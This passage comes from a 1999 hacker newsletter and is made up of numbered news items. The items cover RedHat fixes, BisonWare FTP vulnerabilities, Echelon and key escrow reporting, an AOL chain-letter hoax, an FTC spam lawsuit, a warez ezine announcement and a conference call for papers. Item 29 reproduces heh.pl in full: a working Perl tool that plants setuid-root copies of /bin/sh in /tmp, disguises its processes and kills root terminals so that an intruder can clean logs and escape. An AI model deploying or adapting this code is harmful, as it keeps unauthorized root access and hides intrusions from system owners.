29.0 heh.pl creates a number of rootshells in /tmp and disguises itself..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
Heh.pl - Heh.pl is a program that creates a user specified number of rootshells in /tmp, disguises itself, monitors the clone rootshells, and logs out all root
terminals and disables console when desired, giving you time to clean logs and make a quick exit. Simple, but neat. 3k. By feach, We're All Gonna Die cult.
#!/usr/bin/perl
# Heh.pl
# By: feach
#
# this program creates rootshells
# in /tmp you pick the amount of shells, it
# disguises itself, watches for the other clones, and
# kills root if any clones die.
#
# Shouts Out: me, sirgrim, www.WAGD.com, #hacking on webchat
#
#
&set_vars;
while ($famsize > 1) {
&forker;
$famsize--;
}
&initialize;
&controlfreak;
die "this shit wont werk were ur dumbass is at";
# THIS IS THE ONLY SECTION YOU NEED TO CHANGE
sub set_vars {
$famsize = 20; #how many additional clones do you want
$rootid = 0;
$shelltime = 15; # Tells you to leave the clones out for 15 seconds
$sleeptime = 45; #To sleep 45 seconds between clones
$paranoid = 0; # set this if you want to kill *all* shells, not just root
# look at that below get creative make this prog kick some ass
#@psnames = ('vi','nfsiod','kflushd','kswapd','update','lpd','/usr/sbin/rpc.mountd','/usr/sbin/rpc.nfsd','0wned');
@psnames = ('dickhead','shitface','fuck','diebitch','x0x','phucewe','mountme','shitd','0wned');
}
sub initialize {
&set_vars;
&disguise;
&scent;
sleep 2;
&fraternize;
}
sub disguise {
srand(time ^ $$);
$randum = int(rand(9));
$0 = $psnames[$randum];
}
sub controlfreak {
$end = 0;
$slept = 0;
$shell = 0;
while ($end < 1) {
&check_bro;
sleep 1;
++$slept;
if ($shell == 0 && $slept > $sleeptime) {
&make_shell;
$slept = 0;
$shell = 1;
}
if ($shell == 1 && $slept > $shelltime) {
&kill_shell;
$slept = 0;
$shell = 0;
}
}
}
sub panic {
&kill_roots;
&set_vars;
while ($famsize > 1) {
&forker;
$famsize--;
}
&initialize;
&kill_roots;
}
sub scent {
open PSLOG, '>>/tmp/31336.tmp';
print PSLOG "$$-";
close PSLOG;
}
sub fraternize {
open (PSLIST, '/tmp/31336.tmp') || die "no ps list!!!\n";
@brolist = split("-",<PSLIST>);
close PSLIST;
sleep (4);
if (-e '/tmp/31336.tmp') { unlink '/tmp/31336.tmp';}
}
sub check_bro {
$ok = 0;
foreach $ps (@brolist) {
unless (kill 0,$ps) { &panic;}
}
}
sub make_shell {
unless (-e '/tmp/.nfsd') {
system ('cp /bin/sh /tmp/.nfsd');
system ('chmod 4755 /tmp/.nfsd');
}
#system ('touch -t 031320251996 /tmp/.nfsd);
}
sub kill_shell {
if (-e '/tmp/.nfsd') {
unlink '/tmp/.nfsd'; #a better shell killer...
}
}
sub kill_roots {
open( PSK, "ps -jax |");
while ($xx = <PSK>)
{
chop ($xx);
@info = split(" ", $xx, 10);
if ($info[7] == $rootid && $info[9] =~ 'sh') {
unless ($info[9] =~ 'flush') {kill 9,$info[1];}
}
}
close(PSK);
}
sub forker {
$spawn_id = fork();
die "fork failed: $!" unless defined $spawn_id;
if ($spawn_id) {
waitpid($spawn_id,0);
}
else {
$dfork = fork();
die "double fork failed $!" unless defined $dfork;
if ($dfork) {
exit 0; }
$famsize = 0;
}
}
@HWA
30.0 RedHat 6.0 fixes available for some current vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sun, 16 May 1999 13:01:46 +0200
From: Hugo van der Kooij <hvdkooij@CAIW.NL>
To: BUGTRAQ@netspace.org
Subject: Red Hat Linux 6.0 fixes
Hi,
As Red Hat did not send messages around I will fill in this gap for now.
(Hello Red Hat. Don't get sloppy on this.)
There are a few fixes available for Red Hat Linux 6.0 which can be found
on ftp://updates.redhat.com/6.0/ and these include:
- Newer floppy images for i386.
- newer pump package to fix DHCP anomalies.
- newer xscreensaver package to fix security issues.
- newer apmd package (i386 only)
See also:
http://www.redhat.com/corp/support/errata/rh60-errata-general.html
Hugo.
PS: There is no info about these images on the website. But it just adds
support for the ICP Vortex controler according to the README file
PS/2: There are some typo's on the errata pages. It would be nice if these
were fixed as well.
--
Hugo van der Kooij; Oranje Nassaustraat 16; 3155 VJ Maasland
hvdkooij@caiw.nl http://www.caiw.nl/~hvdkooij/
--------------------------------------------------------------
Use of any of my email addresses for unsollicited (commercial)
email is a clear intrusion of my privacy and illegal!
@HWA
31.0 BisonWare FTP server vulnerabilities can lead to root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 17 May 1999 12:52:02 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Vulnerabilities in BisonWare FTP Server 3.5
Arne Vidstrom submitted the following observations regarding BisonWare
FTP Server 3.5. I contacted the authors of BisonWare and gave them a
copy of Arne's message. After each of Arne's observations I include the
response from BisonWare's Nick Barnes sent back to me.
If you respond to this message, please ensure you're responding to Arne,
Nick, and/or the NTBugtraq list (as opposed to responding to me).
Cheers,
Russ - NTBugtraq Editor
AV=Arne Vidstrom (winnt@BAHNHOF.SE - May 8th, 1999)
NB=Nick Barnes (nick_barnes@compuserve.com - May 16th, 1999)
AV
>Hi everybody,
>
>I've found a few vulnerabilities in BisonWare FTP Server 3.5 (latest
>version). Perhaps they are already know, but here they are:
>
>1) The server doesn't close the old socket from the last PASV command
>when given a new PASV command. Thus, it runs out of buffer space if you
>give lots of PASV commands in a row. Finally, you can't use the server,
>and it consumes lot's of memory that isn't released when the client
>disconnects.
NB
>1. Fixed in release 4.1 due out in the next 10 days.
AV
>2) If you log in and give the command "PORT a", and then press Enter
>a few thousand times in a row, the server will crash because it can't
>handle a non-numeric character after PORT and somehow adds all the
>CRLF's to the PORT command in a buffer that seems to overflow.
NB
>2. Fixed in release 4.1
AV
>3) There are buffer overflows for commands that take arguments, for
>example LIST xxxx (1500 characters) and CWD xxx (1500 characters) will
>crash it. This works for the USER command too, so an attacker won't
>need a valid account to crash the server.
NB
>3. Fixed in release 4.1
AV
>4) The account passwords are stored in plaintext in the registry, at
>HKEY_CURRENT_USER\Software\BisonWare\BisonFTP3\Users and are also
>shown when you manage users in the server. They are also added to the
>logs when users log in, depending on how you configure logging. So
>don't put your logs in a directory that can be viewed by FTP users. ;)
NB
>4. Fixed in release 4.1. Passwords will still be stored plain within
>the registry. The registry should only ever be available to the
>administrator, and some large corporate clients use there own software
>to build user lists.
AV
>5) Another point is that after default installation, an anonymous user
>can access everything in your computer because you have to set the
>limitations after installation. You can't really count that as a bug I
>guess, but it's really dangerous anyway... so if you run this server,
>make sure you reconfigure it if you haven't already!!!
NB
>5. This isn't really a bug from our point of view. The whole point is
>to allow FTP operation immediately after install. This is a selling
>advantage over competitive products which require lots of set up before
>you can use them with a client such as your browser.
@HWA
32.0 Key Escrow revisited (who are the real criminals here??)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Key Escrow Not Just to Bust Criminals Anymore
contributed by Weld Pond
A working document for the Scientific and Technological Options Assessment panel, recently released by the
European Parliament, claims the United States has tried to persuade European Union countries to adopt its key
escrow or key recovery policies. These policies would allow backdoor access to encryption programs. The US
has claimed that this was necessary to read messages exchanged by criminals. The report clams however that
the UKUSA alliance, which includes the United Kingdom, United States, Canada, Australia, and New Zealand, has
used its secret Echelon global spying network to intercept confidential company communications and give
them to favored competitors. The report also claims that the NSA had struck deals with Microsoft, Lotus,
and Netscape to alter their products for foreign use, presumably to make it easier for the NSA to intercept
communications.
C|Net
http://www.techweb.com/wire/story/TWB19990518S0004
Technology News
Report: U.S. Uses Key Escrow To
Steal Secrets
(05/18/99, 9:27 a.m. ET)
By Madeleine Acey, TechWeb
European plans for controlling encryption
software are nothing to do with law
enforcement and everything to do with U.S.
industrial espionage, according to a report
released by the European Parliament on Friday.
The working document for the Scientific and
Technological Options Assessment panel said the United
States has tried to persuade European Union countries to
adopt its key escrow or key recovery policies -- allowing
backdoor access to encryption programs -- saying this
was necessary to read messages exchanged by
criminals.
But the report details how the UKUSA alliance -- made
up of the United Kingdom, United States, Canada,
Australia, and New Zealand -- has used its secret
Echelon global spying network to intercept confidential
company communications and give them to favored
competitors. Thomson S.A., located in Paris, and Airbus
Industrie, based in Blagnac Cedex, France, are said to
have lost contracts as a result of information passed to
rivals.
"The U.S. government misled states in the EU and
[Organization for Economic Cooperation and
Development] about the true intention of its policy," the
report adds.
"Between 1993 and 1997 police representatives were not
involved in the NSA [National Security Agency]-led
policy-making process for key recovery. Despite this,
during the same period the U.S. government repeatedly
presented its policy as being motivated by the stated
needs of law-enforcement agencies."
The document went on to detail how the agencies
specifically studied Internet data. Apart from scanning all
international communications lines -- using 120 satellites,
microwave listening stations, and an adapted submarine
-- it said they stored and analyzed Usenet discussions.
"In the U.K., the Defence Evaluation and Research
Agency maintains a 1-terabyte database containing the
previous 90 days of Usenet messages."
The "NSA employs computer 'bots' (robots) to collect
data of interest," the report adds. "For example, a New
York website known as JYA.COM offers extensive
information on cryptography and government
communications interception activities. Records of
access to the site show that every morning it is visited by
a bot from NSA's National Computer Security Center,
which looks for new files and makes copies of any that it
finds."
According to a former employee, NSA had by 1995
installed "sniffer" software to collect traffic at nine major
Internet exchange points.
The report offered evidence that a leading U.S. Internet
and telecommunications company had contracted with
the NSA to develop software to capture Internet data of
interest, and that deals had been struck with Microsoft,
Lotus, and Netscape to alter their products for foreign
use.
"There can't be any doubt any longer that there's an
economic imperative to these policies," said Simon
Davies, director of Privacy International. "We have been
lied to for years. But it will be up to companies like
Airbus to take legal action to force a definition of national
security in the context of the European Union. Then we
can establish a legal framework and appeals process."
Meanwhile, the Financial Times reported on Monday
that the U.K. government had agreed to take key escrow
"off the agenda" and had accepted industry proposals for
a "largely voluntary program of co-operation with the
security services".
Government officials could not confirm the report.
But Caspar Bowden, director of the Foundation for
Information Policy Research, questioned how far any
compromise would go. "Will they persist with statutory
licensing [of trusted third parties]and criminal legislation
on decryption warrants?" he asked.
Andrew Dornan of Data Communications
International contributed to this report.
@HWA
33.0 AOL Under Siege by Hackers, NOT!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by wariac
Print and online media are bad enough but television
'news' has got to be the worse information source on
the planet. The local CBS affiliate in Tucson Arizona,
KOLD, ran a lead story on its 10pm "news-cast" last
week that claimed that 'hackers' had invaded AOL and
where threatening to distribute the personal information
of its users. Unless of course that user forwarded an
email to 10 other users within 45 minutes. KOLD aired
this "news" without confirmation, without contacting an
independent third party, without even getting an official
response from AOL. All they had was the copy of an
email from someone who wasn't even a user of AOL!
This email was evidently enough to run a several minute
segment as the lead story and scare the hell out of
several thousand viewers in the Tucson area. And
people wonder why Joe Schmoe is afraid of the Internet.
Star Net Dispatches
http://dispatches.azstarnet.com/joe/1999/0518-926992417.htm
Hacking the boob tube
By Joe Salkowski
StarNet Dispatches
Tue May 18 00:23:01 1999
Head for the hills, everyone: A "hacker group" is
conspiring to "create problems in your personal
life."
At least, that's the word from the crack
investigative reporters at KOLD, Channel 13,
Tucson's CBS television affiliate. The station that
patrols Tucson's skies in its very own rent-to-own
helicopter led its 10 p.m. "news"-cast last
Wednesday with a threatening Internet story that
apparently escaped the attention of lesser,
ground-hugging journalists.
"They say they have your personal information,
including credit card numbers and Social Security
numbers," anchor Chris Pickel warned in her most
ominous tone. "And unless you do as they say,
they're going to use it against you."
Co-anchor Randy Garsee went on to explain that a
"hacker group" was sending out e-mail messages
threatening to divulge personal information from
recipients' America Online accounts unless they
forwarded the message to 10 AOL users within 45
minutes. The report, accompanied by a
grammatically challenged "You Got Mail" graphic,
was delivered with the breathless rush of a
Lewinsky-level scoop.
"Does AOL know about this?" Garsee asked
reporter Valerie Cavazos. "Well," she responded
with barely suppressed glee, "they do now."
Indeed. They know, like most Net users should,
that KOLD fell hard for one of the oldest, lamest
tricks on the Net.
The menacing message that consumed three
minutes of supposedly precious airtime was nothing
more than a chain letter - the sort that promises ten
years of bad luck will befall those who don't send it
along. No "hacker group" or anyone else could
carry out the threats contained in the message, and
nobody who knew anything about the Net would
pass it along.
But KOLD didn't think twice - or even once -
before passing the threats along to a few thousand
viewers.
"This is not as thorough as we probably could have
been," KOLD News Director Carolyn Kane
conceded the next day. "Our follow up will say that
the only way to get yourself in trouble is to fall for
this letter."
The story began when Chris Lamb, a 40-year-old
warehouse manager for a local pet supply
company, phoned KOLD Wednesday to ask about
the e-mail message he'd just received from a
friend. "I called just to see if they had heard
anything about it," he said. "I didn't realize what
would happen then."
Lamb, who admits he's "not the most
computer-literate person," said he wasn't sure the
message was authentic. "That's kind of what I
mentioned to Channel 13," he said. "But they said
they wanted to do the story."
AOL's main office in Virginia was closed by the
time Cavazos got the story, Kane said. So the
reporter talked to someone at AOL's local
telephone support center who didn't know anything
about the message or its claims. Instead of waiting
until the next day for an intelligent response from
AOL, Cavazos and her editors decided to air her
story that night.
"AOL says that this is the first time that they've
heard about it and are now frantically trying to
figure out if this was a prank or if the hacker group
did indeed figure out a way to get into sensitive
AOL files," Cavazos reported. She used the word
"frantically" again later in her report, suggesting
she had a telepathic grasp of happenings inside
AOL's headquarters - which were, you'll
remember, closed for the night.
Cavazos offered some details from the letter,
including its threat that recipients' AOL account
would be "messed around with." She also hinted
that a "hacker group" could indeed have "cracked"
the password to AOL's secret files, a point she
illustrated by displaying a Web site with
black-market copies of consumer software
programs.
Had she instead displayed a clown painting on
black velvet, it would have been equally relevant.
The fact that consumer software can be "cracked"
doesn't prove that a "hacker group" could access
the entirety of AOL's account information by
figuring out a single password, as the message
claimed could be done.
That feat is, in fact, impossible, AOL spokesman
Rich D'Amato told me the next day. While he
wouldn't divulge
how AOL secures that data, he
said it wasn't sitting behind a single password on a
public Web server. "That's a safe assumption," he
said.
"If someone says they have all your personal
information, you should react to that the same way
you would in real life," D'Amato said. "Take a
moment think about it. Don't knee-jerk react to it."
But there wasn't much thinking going on at KOLD
last Wednesday. In fact, it didn't even bother
Cavazos that Lamb, the lone on-camera source of
her story, isn't an AOL subscriber - meaning he
couldn't possibly have been affected by the threats.
Viewers learned this only when Garsee asked
Cavazos after her report if Lamb obeyed the
commands in the message and what happened if
he didn't. "He doesn't know that. Nothing has
happened so far. Um, he actually was not an AOL
user," she stammered. "So it hasn't affected his
AOL program."
So let's get this straight: KOLD led its newscast
with a story about a "hacker group" that doesn't
exist sending threats that couldn't possibly be
carried out to a person who couldn't have been
harmed - all after an announcer promised that "For
accurate, concise reporting, watch News 13." (For
television news reporters who might be reading this
story, I'll explain that this qualifies as irony.)
When I called Kane, the news director, she began
our conversation by defending the story. "We were
just saying this is a letter that people had gotten.
Valerie did it from that point of view," she said.
Later, though, she conceded that her station should
have held off on the story. "We really should have
had whatever AOL says it was," she said. "That's
why I'm insisting we make sure we follow this up."
The next night, KOLD's 10 p.m. news included a
30-second segment informing viewers that the
message was a hoax. But just to be safe, the
anchor advised, don't open e-mail sent from people
you don't know.
Say what?
Oh, never mind.
If you ever wonder why ordinary, TV-watchin'
folk are so afraid of what they might find on the
Internet, this comedy of errors should explain
things quite nicely. While many reporters have
wised up to the realities of the Net, the talking
heads of local television news must have been
busy fixing their makeup.
Since most local television news reporters are
assigned to cover a wide variety of subjects, they
aren't likely to become experts in any one of them.
But it shouldn't be too much to ask that they apply
a little common sense and basic reporting skills
before airing stories that ultimately mislead and
confuse their unfortunate audience.
Kane told me her news team would have more
Internet related stories in the near future, but I'm
not sure I can bear to watch. Before they do
another story about the Net, they really ought to
dip into their helicopter budget and purchase a
clue.
Text of "hacker" e-mail (WARNING:
Contains profanity)
Your Screen Name has Been Added to the
ß(r)øöô¥ £ Hackers List!
Here is how we work. Because we master AOL
everytime this letter is sent out a copy is also
instantly send to us. We then scan out all the
names, and place them on our hackers list. Once
you send out this letter 10 times your name again
is instantly removed from our list. If this letter is
not sent out exactly 45 minutes after you have
opened it your name will not be able to be
removed from our hacking list. Here is what
happened when your name is stuck on the
ß(r)øöô¥ £ hackers list.
-Your AOL password is pulled out of AOL's
files. Stupidly AOL stores your password on a
password access website. We have cracked the
password needed and have access to every
account except for AOL guides (cat guides).
-We gain your credit card number, social security
number, and home address. Your credit card
information and home address is stored at the
AOL site and with that we can gain you social
security number.
-Everytime you sign on AOL your account will
be messed around with.
-and much, much more with the power of
ß(r)øöô¥ £ hackers.
Don't believe this? We don't care at all because
not following the directions given will harm you in
over 10 ways. All you have to do is send this out
to 10 people and you will never have to worry
about this again. If you receive this letter again
after sending it out you don't need to send it out
again, because your name is not able to be put
back on.
Why are we doing this? It is to get back at AOL,
and we are taking action. When the members of
ß(r)øöô¥ £ hackers first signed up for AOL
they were not hackers. Once they had to start
paying 21 dollars for AOL they decided to fuck
over AOL. Also the ß(r)øöô¥ £ hackers are
doing this because of the many ads on AOL.
When you first sign on AOL you receive too
many ads and shit when you go to AOL
channels, and more pop ads when you click on
things. We have had enough! That's why
ß(r)øöô¥ £ exists. All you must do now is send
this to 10 other AOL members and you will
never again have to worry about ß(r)øöô¥ £
hackers.
SEND THIS OUT NOW TO 10 PEOPLE IF
YOU WANT TO SAVE YOUR ACCOUNT,
CREDIT CARD, AND MUCH MORE!
@HWA
34.0 Unknown spammer gets sued
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
FTC Sues Unknown Spammer "Anyway"
contributed by webmaster
The Federal Trade Commission has announced that it has filed a suit in the U.S. District Court in Charlotte
against an unknown defendant. The individual, who is unknown at this time is accused of sending spam as
part of a telemarketing scam. The FTC predicts that they will have enough information to name a suspect
within a few days. A choice quote from the article, "Anonymity doesn't necessarily stand in the way of
some kind of law enforcement," said Eileen Harrington, the FTC's associate director of marketing practices.
"We sued them anyway." Pretty soon we'll have them suing "unknown hackers" for million dollar damages. Oh,
wait that already is happening isn't it?
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/spamscam990518.html
Spam Scam Creator Sued
Junk E-Mail Prompts Consumer Calls Overseas
By Kalpana Srinivasan
The Associated Press
W A S H I N G T O N, May 18 Clifton Taylors 12-year-old grandson was doing his homework
on the Internet when he received an e-mail message saying his order for a purchase had
been processed and $375 would be billed to his credit card in the next two days.
To cancel the order that he had never placed,
the 7th-grader was supposed to call the number on the screen immediately. But instead of
a consumer representative, on the other end was a pornographic recording from a site in the West
Indies. The international toll call popped up on the familys phone bill shortly after.
This approach was so different it caught us by surprise, said Taylor, a retired school teacher living
outside of Charlotte, N.C.
The scheme a combination of spamming, or junk e-mail, and telemarketing fraud has already prompted
20,000 consumers to complain to America Online.
Suit Filed Against Scam Mastermind
The Federal Trade Commission today was announcing a suit filed in U.S. District Court in Charlotte against the
unknown defendant who masterminded the scam. The agency says this action the first taken against an
unnamed perpetrator is a warning to con artists who try to hide behind the vast, faceless Internet.
Anonymity doesnt necessarily stand in the way of some kind of law enforcement, said Eileen Harrington,
the FTCs associate director of marketing practices. We sued them anyway.
Harrington predicts the commission will have enough information to name a defendant in a few days. In the
meantime, the court order has blocked the flow of money from American telephone carriers to the foreign telephone
company that pays the operators of the hotline.
Breaking Through Forged Addresses
The case highlights some of the inherent challenges in tracking down and stopping the senders of junk e-mail,
also known as spam. A common tactic among con artists sending spam, including those cited in todays action, is to
use a variety of forged e-mail addresses so they cannot be reached.
Ray Everett-Church, co-founder of the Coalition Against Unsolicited Commercial E-Mail, likens the
problem to the arcade game whack-a-mole: no sooner does the mole get hit by the mallet in once place, than it
pops up quickly in another.
Spammers rapidly move from sending site to sending site, said Everett-Church. That makes it futile for a
server provider to block one specific e-mail address. But, he added, companies can block e-mails based on their
content, for example filtering out all messages that contain a particular word or telephone number.
The problem comes in finding similarities you can block, he said.
FTC Creating a Spammer DB
The FTC says it is raising the ante against fraud with its own technology. More than a year ago, the commission
began collecting spam forwarded to it by consumers, creating a database with hundreds of thousands of
messages in it.
The commission first learned of the scheme after a consumer submitted an online complaint form one of
about 10,000 the FTC receives each week. Using the information provided by the consumer, the FTC ran a
database search and came up with dozens of matches containing the same telephone number.
This technology has given us an enormous leg up against scams that use technology, said Harrington. The
agency was able to pull together a case in a few weeks.
AOL Cooperated With FTC
AOL has a similar mechanism for receiving forwarded junk e-mail. The company has passed on its complaints
about the scam in question, plus copies of the actual spam to the FTC, said Rich DAmato, a spokesman for Dulles,
Va.-based AOL.
The FTC has asked the court for the money already paid by customers to their telephone companies for the
toll charges to be put aside for consumer restitution and for the company to be barred from violating the law
through its deceptive messages.
A successful case against the perpetrators would come as vindication to Taylor. He contacted a litany of people
from his phone company to members of Congress to local police to report the matter. Most rebuffed him because he
didnt have enough follow-up information for them to pursue a case.
While he was furious about the e-mail, Taylor said his anger got worse because I couldnt get anywhere with
anybody. The whole thing just completely rubbed me the wrong way.
@HWA
35.0 German Police Crack Down On Internet Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/ May 19th
Germans Go After Inet Crime
contributed by Y0han
German officials are hoping to contain the spread of politically extreme matter or, child pornography over the
Internet. Deputy Interior Minister Claus Henning Schapper recently announced that German police are
developing an Internet search engine that will zero in on illegal activity on the Web such as pedophile networks
and neo-Nazi propaganda.
Yahoo News
http://biz.yahoo.com/rf/990517/i7.html
Monday May 17, 7:44 am Eastern Time
German police develop Internet crime-buster
BONN, May 17 (Reuters) - German police are developing an Internet search engine that will home in on illegal
activity on the Web, including paedophile networks and neo-Nazi propaganda, and lead detectives to those who
publish or even view such sites, an official said on Monday.
``It should make it easier for the police to pinpoint criminal content on the Internet, secure evidence and
identify the senders and addressees,'' Deputy Interior Minister Claus Henning Schapper told a conference on
Internet security in Bonn.
``Using it, we want to contain the spread of, for example, politically extreme matter or, highly important,
child pornography over the Internet.''
He gave no further details of the device nor did he say when it might come into operation.
@HWA
36.0 After a rather long hiatus BoW resurfaces and releases issue #9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Brotherhood Of Warez was/is an ezine that takes a pisstake approach to the scene and has climbed up
from the mire to produce #9 of their series of ezines, numbers 1 thru 8 were released in 1992-1994...
From HNN http://www.hackernews.com/
BoW 9 Is Here!
contributed by Velkro Kode Warrior
BoW Magazine, an electronic ezine started in 1992 as a reaction to the degradation of the so-called "H/P scene"
that was around at the time, has after a five year hiatus released its ninth issue. Eight issues of BoW were
released from 1992-1994, and now BoW magazine is back with a much overdue ninth issue.
BoW #9
http://www.velkro.net./
The Press release;
KRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWARE
...:::||| OFFICIAL PRESS RELEASE |||:::...
__________ __ .__ .__ .___
\______ \_______ _____/ |_| |__ ___________| |__ ____ ____ __| _/
| | _/\_ __ \/ _ \ __\ | \_/ __ \_ __ \ | \ / _ \ / _ \ / __ |
| | \ | | \( <_> ) | | Y \ ___/| | \/ Y ( <_> | <_> ) /_/ |
|______ / |__| \____/|__| |___| /\___ >__| |___| /\____/ \____/\____ |
\/ \/ \/ \/ \/
_____ __ __
____ / ____\ / \ / \_____ _______ ____ ________
/ _ \ __\ \ \/\/ /\__ \\_ __ \_/ __ \\___ /
( <_> ) | \ / / __ \| | \/\ ___/ / /
\____/|__| \__/\ / (____ /__| \___ >_____ \
\/ \/ \/ \/
K-R4D FOR THE AYCH-PEE NAT10N
KICKIN IT IN 1999
-**=< BoW Ann0unc3Zz Issu3 N1n3!@#$ >=**-
PHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOW
Th4tz r1ght f0lkZz! BoW numb3r n1ne is in the works. The p3ople th4t brought you
th3 ever-pheared .rhosts exploit and the exclusive D4l3 dr3w g3rbling photos are
str1king b4ck in 1999 w1th m4d T4e-BoW sk1llz.
-**=< FuCk St4r W4rs -- R34d BoW!@%#$ >=**-
Wh3n M4y 19th r0llz 4r0und, 4nd y0u k4nt g3t 1n t0 s3e St4r W4rs, just s1t b4ck,
r3l4x, s4y "Fuck 1t!@#," 4nd gr4b 4 c0py 0f BoW 9.
The Numb3r n1ne is a v3ry important number to the 1nner sanktum of BoW. NiNE is
the number th4t always returns unto its3lf. Take a look:
9 x 31337 = 282033
2 + 8 + 2 + 0 + 3 + 3 = 18
1 + 8 = 9 < -- try this with
*your* favorite number
So st4y t00n3d ph0r the BoW Nine Return of the Hack K0m3b4ck Sp3kt4kul4r,
and pr3p4re t0 3nter PH34R N4T10N@!#$!!#$$%!&
SiGN3D:
The BoW Imperial Senate:
U4EA / LISTER / PLUVIUS / SW_R / THE DEADKENNEDY
THE VELKRO KODE WARRIOR / D-CELLERATION TRAUMA
RATSCABIES / KIAD / THE 0WN3D R4NGER
K-Rad BoW Affiliates:
K0D3Z / ANuS / H4G1S / THE Y0RKSH1R3 P0SS3 / GLuE
MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY
(K) Kopywrong
__________ __ __ ____ ________ ________ ________
\______ \ ____/ \ / \ /_ / __ \/ __ \/ __ \
| | _// _ \ \/\/ / | \____ /\____ /\____ /
| | ( <_> ) / | | / / / / / /
|______ /\____/ \__/\ / |___| /____/ /____/ /____/
\/ \/
distribute everywhere
Spreading the Zeroday Your Way since 1992
The Few, The Pr0ud, Th3 pheared. The BoW.
THE BROTHERHOOD OF WAREZ
www.velkro.net
bow@velkro.net
MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY
END 0F TR4NZM1ZZi0N...
PHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOW
@HWA
37.0 AntiOnline opens up its knowledge database to the pheds
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Seen via HNS http://www.net-security.org/
Knowledge Base Applications
Monday, May 17, 1999 at 23:06:28
by John Vranesevich - Founder of AntiOnline
AntiOnline is pleased to announce that it is now taking
applications for access to its knowledge base. Access to this
area of AntiOnline will be restricted to military and federal
law enforcement personnel only.
The knowledge base will provide resources and information
which AntiOnline feels is too sensitive to make available to the
general public as a whole.
In order to gain access to this area of AntiOnline, users are
required to fill out and sign the application below, and fax it to
the AntiOnline offices (724-773-0941) on official letterhead.
AntiOnline will turn over any instances of suspected falsification
of records, or any individuals who are suspected of
impersonating a federal authority to the proper agencies for
investigation.
Please Note: Due to high demand, it may take up to 4 weeks to
activate an account.
Official Request For Access
AntiOnlines Knowledge Base
An Interface To The "Omnipotent One" Intelligence System
Last Name: __________________________________
First Name: __________________________________
Affiliation: ___________________________________
Rank/Title: ___________________________________
City or APO or FPO: _____________________________________
State or APO/FPO: _______________________________________
Zip Code: _____________________
Commercial Phone: _______________________________________
Commercial FAX: _________________________________________
Official E-mail Address: __________________________________
In order to insure the continued security of the Knowledge Base,
AntiOnline requires you to access the system from a static IP
address. Furthermore, this address must reverse-resolve back
to the organization that you are officially affiliated with.
IP Address: ________________________
Address Resolves To: ________________________________
End Page One - Initial Here: _____
To allow AntiOnline staff members to contact you about your account in
a secure way, we require that you register your Public PGP Key with
AntiOnlines Public Key Server. Details on how to do this are located at
http://www.antionline.com/resources/pgp-key-server/ The key must be
registered under the official e-mail address that you listed above. If your
organization prohibits the use of PGP Encryption, make a note of it below:
PGP Comments: ______________________________________________
I understand that the information contained within AntiOnlines Knowledge Base is considered sensitive.
I hereby attest that any information that I obtain from said knowledge base will not be distributed to any third party, with the exception of:
1. any individual affiliated with my organization that I am directly assigned to work with on an official basis.
2. any information which I am subpoenaed or otherwise required to turn over to a court of law as part of a civil or criminal proceeding.
I hereby attest that the above information that I provided about myself, the organization that I am affiliated with and its policies, is accurate to the best of my knowledge.
I hereby attest that the letterhead which this FAX was originally printed on is the official letterhead of the organization that I am affiliated with, and that I am using it on an official basis in accordance with the policies and procedures set forth to me by said organization.
Signed: _________________________________
Print Name: _____________________________
Initial: ________
@HWA
38.0 [ISN] RAID99 Hosted by CERIAS Call for papers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Return-Path: <owner-isn@repsec.com>
Date: Sun, 16 May 1999 04:00:28 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] RFP -- Upcoming workshop hosted by CERIAS: RAID'99
Message-ID: <Pine.SUN.3.96.990516035955.29238C-100000@flatland.dimensional.com>
X-NoSpam: You do not have consent to spam me.
X-Attrition: Attrition is only good when forced. http://www.attrition.org
X-Copyright: This e-mail copyright 1999 by jericho@dimensional.com where applicable
X-Encryption: rot26
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-isn@repsec.com
Precedence: bulk
Reply-To: cult hero <jericho@dimensional.com>
x-unsubscribe: echo "unsubscribe isn" | mail majordomo@repsec.com
x-infosecnews: x-loop, procmail, etc
Forwarded From: spaf@cs.purdue.edu
We're hosting this important workshop in intrusion detection. The
deadline for submissions is fast approaching, so we'd like to remind you
all to consider making a submission.
Call For Participation - RAID'99
Second International Workshop on the
Recent Advances in Intrusion Detection
Dates: September 7-9, 1999
West Lafayette, Indiana, USA
an html version of this CFP is available at
http://www.zurich.ibm.com/pub/Other/RAID
Corporate Sponsors:
The SANS Institute
IBM Business Recovery Services
